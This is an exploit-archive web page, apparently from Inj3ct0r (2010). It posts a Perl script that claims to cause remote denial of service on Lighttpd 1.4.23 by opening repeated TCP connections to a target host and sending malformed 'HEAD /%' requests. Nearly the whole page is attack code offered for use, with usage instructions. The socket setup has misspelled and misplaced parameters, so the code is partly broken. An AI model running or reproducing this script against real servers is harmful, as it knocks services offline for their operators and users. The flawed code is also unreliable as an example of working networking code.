Lighttpd Server 1.4.23 Remote Denial of Service
Posted on 05 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Lighttpd Server 1.4.23 Remote Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Lighttpd Server 1.4.23 Remote Denial of Service =============================================== #!/usr/bin/perl # # Lighttpd Server 1.4.23 Remote Denial of Service # #AuThoR:GlaDiaT0R #Mail: The_gl4di4t0r[AT]hotmail.com use IO::Socket; print "[+] Author : GlaDiaT0R "; print "[+] Mail : the_gl4di4t0r[AT]hotmail[DOT.com "; print "[+] Title : Lighttpd Server 1.4.x Remote Denial of Service "; if (@ARGV < 1) { print "[-] Usage: <nice.pl> <host> <port> "; print "[-] Exemple: nice.pl 127.0.0.1 80 "; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; print "[+] DOS... "; for($i=0;$i<20;$i++) { $socket = IO::Socket::INET->new( Port => "tcp", ipadress => "$ip", PeerPort => "$port") || die "[-] Failed "; print $socket "HEAD /% HTTP/1.0 "; } print "[+] Done successfully!! "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>